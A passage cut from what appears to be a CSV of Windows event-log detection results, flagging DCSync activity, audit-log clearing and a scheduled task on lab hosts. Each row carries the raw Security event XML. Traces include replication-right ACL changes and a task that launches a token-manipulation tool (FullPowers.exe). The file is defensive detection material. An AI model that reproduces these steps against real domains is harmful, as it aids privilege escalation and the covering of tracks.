SWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14675</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.022631Z"">
</TimeCreated>
<EventRecordID>198242589</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2868"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">2EA9670C-F0F9-4D3F-90E5-A087E8C05863</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;C
R;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14674</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.022631,2019-03-26T01:28:45.022631+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.022631Z"">
</TimeCreated>
<EventRecordID>198242588</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""896"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">2EA9670C-F0F9-4D3F-90E5-A087E8C05863</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)
(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14675</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
schedule task created,1583587059.98454,2020-03-07T17:17:39.984540+04:00,,Audit,High,schedule task created by user,4698,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4698</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-07T13:17:38.534995Z"">
</TimeCreated>
<EventRecordID>282588</EventRecordID>
<Correlation ActivityID=""1CC43E9D-F481-0001-373F-C41C81F4D501"">
</Correlation>
<Execution ProcessID=""620"" ThreadID=""672"">
</Execution>
<Channel>Security</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-19</Data>
<Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
<Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
<Data Name=""SubjectLogonId"">0x3e5</Data>
<Data Name=""TaskName"">\FullPowersTask</Data>
<Data Name=""TaskContent"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt;
&lt;Task version=&quot;1.3&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt;
&lt;RegistrationInfo&gt;
&lt;URI&gt;\FullPowersTask&lt;/URI&gt;
&lt;/RegistrationInfo&gt;
&lt;Triggers /&gt;
&lt;Principals&gt;
&lt;Principal id=&quot;Author&quot;&gt;
&lt;UserId&gt;S-1-5-19&lt;/UserId&gt;
&lt;RunLevel&gt;LeastPrivilege&lt;/RunLevel&gt;
&lt;RequiredPrivileges&gt;
&lt;Privilege&gt;SeAssignPrimaryTokenPrivilege&lt;/Privilege&gt;
&lt;Privilege&gt;SeAuditPrivilege&lt;/Privilege&gt;
&lt;Privilege&gt;SeChangeNotifyPrivilege&lt;/Privilege&gt;
&lt;Privilege&gt;SeCreateGlobalPrivilege&lt;/Privilege&gt;
&lt;Privilege&gt;SeImpersonatePrivilege&lt;/Privilege&gt;
&lt;Privilege&gt;SeIncreaseQuotaPrivilege&lt;/Privilege&gt;
&lt;Privilege&gt;SeIncreaseWorkingSetPrivilege&lt;/Privilege&gt;
&lt;/RequiredPrivileges&gt;
&lt;/Principal&gt;
&lt;/Principals&gt;
&lt;Settings&gt;
&lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt;
&lt;DisallowStartIfOnBatteries&gt;true&lt;/DisallowStartIfOnBatteries&gt;
&lt;StopIfGoingOnBatteries&gt;true&lt;/StopIfGoingOnBatteries&gt;
&lt;AllowHardTerminate&gt;true&lt;/AllowHardTerminate&gt;
&lt;StartWhenAvailable&gt;false&lt;/StartWhenAvailable&gt;
&lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt;
&lt;IdleSettings&gt;
&lt;Duration&gt;PT10M&lt;/Duration&gt;
&lt;WaitTimeout&gt;PT1H&lt;/WaitTimeout&gt;
&lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt;
&lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt;
&lt;/IdleSettings&gt;
&lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;Hidden&gt;false&lt;/Hidden&gt;
&lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt;
&lt;DisallowStartOnRemoteAppSession&gt;false&lt;/DisallowStartOnRemoteAppSession&gt;
&lt;UseUnifiedSchedulingEngine&gt;false&lt;/UseUnifiedSchedulingEngine&gt;
&lt;WakeToRun&gt;false&lt;/WakeToRun&gt;
&lt;ExecutionTimeLimit&gt;PT72H&lt;/ExecutionTimeLimit&gt;
&lt;Priority&gt;7&lt;/Priority&gt;
&lt;/Settings&gt;
&lt;Actions Context=&quot;Author&quot;&gt;
&lt;Exec&gt;
&lt;Command&gt;C:\Users\Public\Tools\TokenManip\FullPowers.exe&lt;/Command&gt;
&lt;Arguments&gt;-t 4932&lt;/Arguments&gt;
&lt;/Exec&gt;
&lt;/Actions&gt;
&lt;/Task&gt;</Data>
</EventData>
</Event>",MSEDGEWIN10,Security
Audit log cleared,1651380018.084003,2022-05-01T08:40:18.084003+04:00,,Audit,Critical,Audit log cleared by user ( admin ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2022-05-01T04:40:18.084003Z"">
</TimeCreated>
<EventRecordID>21365</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1228"" ThreadID=""9912"">
</Execution>
<Channel>Security</Channel>
<Computer>wind10.winlab.local</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-482804190-775995292-3801157738-1002</SubjectUserSid>
<SubjectUserName>admin</SubjectUserName>
<SubjectDomainName>WIND10</SubjectDomainName>
<SubjectLogonId>0x47ea55</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",wind10.winlab.local,Security
Audit log cleared,1553038508.786016,2019-03-20T03:35:08.786016+04:00,,Audit,Critical,Audit log cleared by user ( user01 ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T23:35:07.524202Z"">
</TimeCreated>
<EventRecordID>452811</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""812"" ThreadID=""3916"">
</Execution>
<Channel>Security</Channel>
<Computer>PC01.example.corp</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-1106</SubjectUserSid>
<SubjectUserName>user01</SubjectUserName>
<SubjectDomainName>EXAMPLE</SubjectDomainName>
<SubjectLogonId>0x17dad</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",PC01.example.corp,Security
Audit log cleared,1553549315.405631,2019-03-26T01:28:35.405631+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:11.073626Z"">
</TimeCreated>
<EventRecordID>198242566</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""744"" ThreadID=""3396"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-738609754-2819869699-4189121830-1108</SubjectUserSid>
<SubjectUserName>bob</SubjectUserName>
<SubjectDomainName>insecurebank</SubjectDomainName>
<SubjectLogonId>0x8d7099</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.026630Z"">
</TimeCreated>
<EventRecordID>198242602</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2868"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">98E50F6A-AE61-4BFF-A9F0-CCFA5CCB555C</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b7
6-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f